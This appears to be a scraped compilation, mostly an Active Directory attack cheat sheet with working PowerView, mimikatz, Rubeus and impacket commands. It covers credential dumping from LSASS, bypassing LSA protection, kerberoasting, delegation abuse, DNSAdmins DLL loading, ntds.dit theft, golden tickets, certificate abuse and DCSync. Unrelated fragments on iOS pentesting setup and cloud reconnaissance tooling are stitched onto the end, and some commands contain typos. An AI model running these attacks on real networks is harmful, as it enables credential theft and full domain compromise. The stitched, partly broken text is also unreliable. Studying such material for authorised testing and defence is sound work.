Enumerate Other Domains:Get-Domain -Domain <DomainName>
Get Domain SID:Get-DomainSID
Get Domain Policy:
Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
#Save all Domain Users to a file
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
#Will return specific properties of a specific user
Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
#Enumerate user logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>
#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
#Save all Domain Groups to a file:
Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
#Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
#Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
Get-NetLocalGroup | Select-Object GroupName
#Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
#Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares:
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
#Enumerate "Interesting" Files on accessible shares
Find-InterestingDomainShareFile -Include *passwords*
Enum Group Policies:
Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
#Enumerate all GPOs to a specific computer
Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
#Get users that are part of a Machine's local Admin group
Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>
Enum OUs:
Get-DomainOU -Properties Name | Sort-Object -Property Name
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>
#Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
Get-DomainTrustMapping
Enum Forest Trust:
Get-ForestDomain
Get-ForestDomain -Forest <ForestName>
#Map the Trust of the Forest
Get-ForestTrust
Get-ForestTrust -Forest <ForestName>
User Hunting:❗Priv Esc to Domain Admin with User Hunting: I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain
Find-DomainLocalGroupMember -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName
#Confirming admin access
Test-AdminAccess
#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>
#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess
#Interact with the session
Enter-PSSession -Session $sess
#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>
#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
#The commands are in cobalt strike format!
#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>
#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys
mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys
#Dump SAM Database
mimikatz lsadump::sam
#Dump SECRETS Database
mimikatz lsadump::secrets
#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
#List and Dump local kerberos credentials
mimikatz kerberos::list /dump
#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>
#List TS/RDP sessions
mimikatz ts::sessions
#List Vault credentials
mimikatz vault::list
❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?
LSA as a Protected Process (Kernel Land Bypass)
#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
#Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
#Now lets import the mimidriver.sys to the system
mimikatz # !+
#Now lets remove the protection flags from lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
#Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords
LSA as a Protected Process (Userland "Fileless" Bypass)
LSA is running as virtualized process (LSAISO) by Credential Guard
#Check if a process called lsaiso.exe exists on the running processes
tasklist |findstr lsaiso
#If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.
Mimikatz:
#We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
privilege::debug
sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"
#Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated
❗ If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
Putting these files in a writeable share the victim only has to open the file explorer and navigate to the share.Notethat the file doesn't need to be opened or the user to interact with it, but it must be on the top of the file system or just visible in the windows explorer window in order to be rendered. Use responder to capture the hashes.
❗ .scf file attacks won't work on the latest versions of Windows.
WUT IS DIS?: All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user" account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
PowerView:
#Get User Accounts that are used as Service Accounts
Get-NetUser -SPN
#Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
#Requesting the TGS for a single account:
Request-SPNTicket
#Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
AD Module:
#Get User Accounts that are used as Service Accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#Kerberoasting and outputing on a file with a spesific format
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
#Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec
#Kerberoast AES enabled accounts
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
#Kerberoast spesific user account
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
#Kerberoast by specifying the authentication credentials
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>
WUT IS DIS?: If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted blob and bruteforce it offline.
AD Module:Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! Check for interesting permissions on accounts:
Hint:We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
PowerView:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
Disable Kerberos Preauth:
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose
Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose
And finally execute the attack using theASREPRoasttool.
#Get a spesific Accounts hash:
Get-ASREPHash -UserName <UserName> -Verbose
#Get any ASREPRoastable Users hashes:
Invoke-ASREPRoast -Verbose
Using Rubeus:
#Trying the attack for all domain users
Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
#ASREPRoast spesific user
Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
#ASREPRoast users of a spesific OU (Organization Unit)
Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
Using Impacket:
#Trying the attack for the specified users on the file
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>
WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it.
PowerView:
#Check for interesting permissions on accounts:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
#Check if current user has already an SPN setted:
Get-DomainUser -Identity <UserName> | select serviceprincipalname
#Force set the SPN on the account:
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
AD Module:
#Check if current user has already an SPN setted
Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
#Force set the SPN on the account:
Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
#List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows
#List shadow copies using diskshadow
diskshadow list shadows all
#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
You can dump the backuped SAM database and harvest credentials.
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
#We now have the masterkey in our local cache:
dpapi::cache
#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!
Using PowerView:
#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay
<WaitInterval> -Verbose
#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'
#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
Now we can access the service as the impersonated user!
🚩What if we have delegation rights for only a spesific SPN? (e.g TIME):
In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
WUT IS DIS?: TL;DR If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
❗ In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.
Once we found a member of this group we need to compromise it (There are many ways).
Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges:
#Using dnscmd:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
#Restart the DNS Service:
sc \\DNSServer stop dns
sc \\DNSServer start dns
WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
#Create a .txt file that will contain the shadow copy process script
Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
}
#Execute diskshadow with our script as parameter
diskshadow /s script.txt
Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to usethisamazing repo:
#Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
#Checking if the SeBackupPrivilege is enabled
Get-SeBackupPrivilege
#If it isn't we enable it
Set-SeBackupPrivilege
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
#Dump the SYSTEM hive
reg save HKLM\SYSTEM c:\temp\system.hive
Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
Use secretsdump.py from impacket and dump the hashes.
Use psexec or another tool of your choice to PTH and get Domain Admin access.
WUT IS DIS?: If we manage to compromise a child domain of a forest andSID filteringisn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of theSID Historyfield on a kerberos TGT ticket, that defines the "extra" security groups and privileges.
Exploitation example:
#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local
#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local
#Create the Enteprise Admins SID
Format: RootDomainSID-519
#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain
dir \\dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /all
Check for Vulnerable Certificate Templates with:Certify
Note: Certify can be executed with Cobalt Strike'sexecute-assemblycommand as well
.\Certify.exe find /vulnerable /quiet
Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.
This should return a valid certificate for the associated DA account.
The exportedcert.pemandcert.keyfiles must be consolidated into a singlecert.pemfile, with one gap of whitespace between theEND RSA PRIVATE KEYand theBEGIN CERTIFICATE.
Theopensslcommand can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
Once thecert.pfxfile has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB,certutil.exe, Cobalt Strike's upload functionality, etc.)
After thecert.pfxfile has been uploaded to the compromised host,Rubeuscan be used to request a Kerberos TGT for the DA account which will then be imported into memory.
.\Rubeus.exe asktht /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt
This should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack.
#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'
#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py <Domain>/<Username>:<Password>@<DC'S IP or FQDN> -just-dc-ntlm
#DCsync using secretsdump.py from impacket with Kerberos Authentication
secretsdump.py -no-pass -k <Domain>/<Username>@<DC'S IP or FQDN> -just-dc-ntlm
Tip: /ptt -> inject ticket on current running session /ticket -> save the ticket on the system for later use
WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!
#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>
#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>
#Alter the Logon behaviour on registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!
WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT.
⚠️The access we will have will be limited to what our DA account is configured to have on the other Forest!
Using Mimikatz:❗ Tickets -> .kirbi format
Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource!
#Dump the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
#Forge an inter-realm TGT using the Golden Ticket attack
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:
<OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:
<PathToSaveTheGoldenTicket>"'
Gather Information about the instance:Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Abusing SQL Database Links: WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!
Check for existing Database Links:
#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instance <SPN> -Verbose
#MSSQL Query:
select * from master..sysservers
Then we can use queries to enumerate other links from the linked Database:
#Manualy:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')
#PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
Get-SQLServerLinkCrawl -Instance <SPN> -Verbose
#Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell
#Or if it is disabled enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
WUT IS DIS?: TL;DR If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest.
#Start monitoring for TGTs with rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$
#Execute the printerbug to trigger the force authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local
#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>
#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /all
Note:- There are a plenty of different tools and methodologies when its coming to the iOS pentesting and I won’t be able to explain all of them, only my methodology will be shared here.
Prerequisites:
1: A Jailbroken iOS device
Setting up the lab and installing basic tools:
1: Hope you already haveFridaandObjectiontools in your system, If not , install them
4:Cydia Application:- Basically, Cydia is a third-party application installer which is similar to the App Store and developed for the jailbroken iOS iDevices. If you are jailbreaking your device with Checkra1n or Uncover, The cydia app will automatically get installed into your device.
What if the Cydia haven’t installed during the jailbreak:
In case ofCheckra1n, you can manually install the Cydia from the Checkra1n app.
In case of Uncover, you can enable theReinstall Cydiaoption from the Uncover app settings and start jailbreaking.
After the jailbreaking process, the Cydia app can be found in the device.
Method for installing Tweaks on the Jailbroken iOS device:
1: With the help of Cydia
Step 1: Add the repo URL of the required cydia tweak in the source section
Step 2: After adding the Source, You can find search the tweak from the search section
Step 3: Select the tweak and install, Respring the device if it is needed.
2: Direct method:
Installing the Tweaks with their .deb files through the OpenSSH terminal
Step 1: Find the Tweak’s deb file from its source.
Step 2: Copy the file link and SSH to the iOS device as root user
Step 3: Download the deb file using wget
Step 4: Make the file executable with the permission command “chmod +x file.deb” and install it using “dpkg”command
Step 5: That’s it, Now the tweak will be installed on your device
Dependencies:
The following packages should be installed on the device:
Cydia Substrate
PreferenceLoader
Installing the required Cydia Tweaks:
Tweaks are basically third party applications which can be used to outrun some sort of fences set up in the target iOS applications. A lot of tweaks are available but here I am listing out the necessary ones.
Note:- Most of the Jailbreak Detection Bypass and SSL Bypass tweaks can be found in the device settings after the installation.
So that’s it guys, We almost ready to go. We will kickstart on our first iOS application pentesting in the Part-2. If I have missed something in this part, we will cover ’em up in the next part. Stay tuned, Happy hacking :)
--write-test: This option tells the script to write a test file. The purpose and content of the test file would depend on the implementation of thecloudhunter.pyscript.
--open-only: This option specifies that the script should only check for open ports or services on the target URL, which in this case ishttp://example.com. It indicates that the script will not attempt to perform any other type of scanning or analysis.
http://example.com: This is the target URL that the script will perform the open port check on. In this example, it is set tohttp://example.com, but in a real scenario, you would typically replace it with the actual URL you want to test.
By replacing<domain>with an actual domain name, the command would attempt to retrieve information specific to that domain using thecf enumtool. The details of what kind of information is gathered and how it is presented would depend on the specific implementation of the tool being used.
ffuf: This is the name of the tool or command being executed.
-w /path/to/seclists/Discovery/Web-Content/api.txt: This option specifies the wordlist (-w) to be used for fuzzing. The wordlist file, located at/path/to/seclists/Discovery/Web-Content/api.txt, contains a list of potential input values or payloads that will be tested against the target URL.
-u https://example.com/FUZZ: This option defines the target URL (-u) for the fuzzing process. The stringFUZZacts as a placeholder that will be replaced by the values from the wordlist during the fuzzing process. In this case, the target URL ishttps://example.com/FUZZ, whereFUZZwill be substituted with different payloads from the wordlist.
-mc all: This option specifies the match condition (-mc) for the responses received from the target server. In this case,allindicates that all responses, regardless of the HTTP status code, will be considered as valid matches.
By providing the--bucketparameter followed by a specific value (gwen001-test002), the script will attempt to brute-force the Amazon S3 buckets using that particular value as the target. The script likely includes logic to iterate through different bucket names, trying each one until a valid or accessible bucket is found.
Data Breaches
fd -t f -e txt . /path/to/data/breaches: This command uses thefdutility to search for files (-t f) with the extension.txt(-e txt) within the directory/path/to/data/breaches. The.represents the current directory. Thefdcommand scans for files matching the specified criteria and outputs their paths.
xargs ag -i "keyword": This command takes the output from the previousfdcommand and passes it as arguments to theagcommand.xargsis used to convert the output into arguments. Theagcommand is a tool used for searching text files. The option-ienables case-insensitive matching, and"keyword"represents the specific keyword being searched for.
Insufficient Security Configuration
The purpose of the command seems to be to perform a takeover attempt on a domain. Domain takeover refers to the act of gaining control over a domain that is no longer actively maintained or properly configured, allowing an attacker to take control of its associated services or resources.
fd -t f -e <file_extension> . /path/to/codebase: This command uses thefdutility to search for files (-t f) with a specific file extension (-e <file_extension>) within the directory/path/to/codebase. The.represents the current directory. Thefdcommand scans for files matching the specified criteria and outputs their paths.
xargs ag -i -C 3 "(default|weak|unrestricted|security settings)": This command takes the output from the previousfdcommand and passes it as arguments to theagcommand.xargsis used to convert the output into arguments. Theagcommand is a tool used for searching text files. The options-ienable case-insensitive matching, and-C 3specifies to show 3 lines of context around each match. The pattern"(default|weak|unrestricted|security settings)"represents a regular expression pattern to search for occurrences of any of the specified keywords within the files.
Insecure Data storage
By replacing<bucket_name>with the actual name of the S3 bucket and<object_key>with the key or path to the desired object within the bucket, the command will initiate the download process for that specific object. The downloaded object will typically be saved to the local file system, with the name and location depending on the behavior of thecf s3downloadtool.
By replacing<url>with the actual target URL, the command will initiate a directory scan on that specific URL using thecf dirscantool. The tool will attempt to enumerate and list directories or paths within the target URL, providing information about the directory structure of the web application or website.
gau -subs example.com: This command uses thegautool to perform a subdomain discovery (-subs) onexample.com. It retrieves a list of URLs associated with the specified domain, including subdomains.
httpx -silent: This command uses thehttpxtool to make HTTP requests to the URLs obtained from the previous command. The-silentoption is used to suppress verbose output, resulting in a cleaner output.
gf unsafe: This command uses thegftool with theunsafepattern to search for potential security-related issues in the HTTP responses. Thegftool allows you to filter and extract data based on predefined patterns.
grep -iE "(encryption|access controls|data leakage)": This command usesgrepto search for lines that match the specified case-insensitive (-i) extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “encryption,” “access controls,” or “data leakage” within the output obtained from the previous command.
ccat: This is the name of the tool or command being executed.
elasticsearch search: This part of the command indicates that the specific action being performed is a search operation in Elasticsearch.
<index>: This is a placeholder for the name of the Elasticsearch index on which the search operation will be performed. The actual index name should be provided in place of<index>.
<query>: This is a placeholder for the search query or criteria to be executed against the specified Elasticsearch index. The actual search query should be provided in place of<query>.
Lack of Proper Logging and Monitoring
findomain -t example.com: This command uses thefindomaintool to perform a subdomain discovery (-t) onexample.com. It searches for subdomains associated with the specified domain and prints the results to the output.
httpx -silent: This command uses thehttpxtool to make HTTP requests to the subdomains obtained from the previous command. The-silentoption is used to suppress verbose output, resulting in a cleaner output.
grep -E "(deployment|configuration management)": This command usesgrepto search for lines that match the specified extended regular expression (-E). The regular expression pattern searches for occurrences of the keywords “deployment” or “configuration management” within the output obtained from the previous command.
findomain -t example.com: This command uses thefindomaintool to perform a subdomain discovery (-t) onexample.com. It searches for subdomains associated with the specified domain and prints the results to the output.
httpx -silent: This command uses thehttpxtool to make HTTP requests to the subdomains obtained from the previous command. The-silentoption is used to suppress verbose output, resulting in a cleaner output.
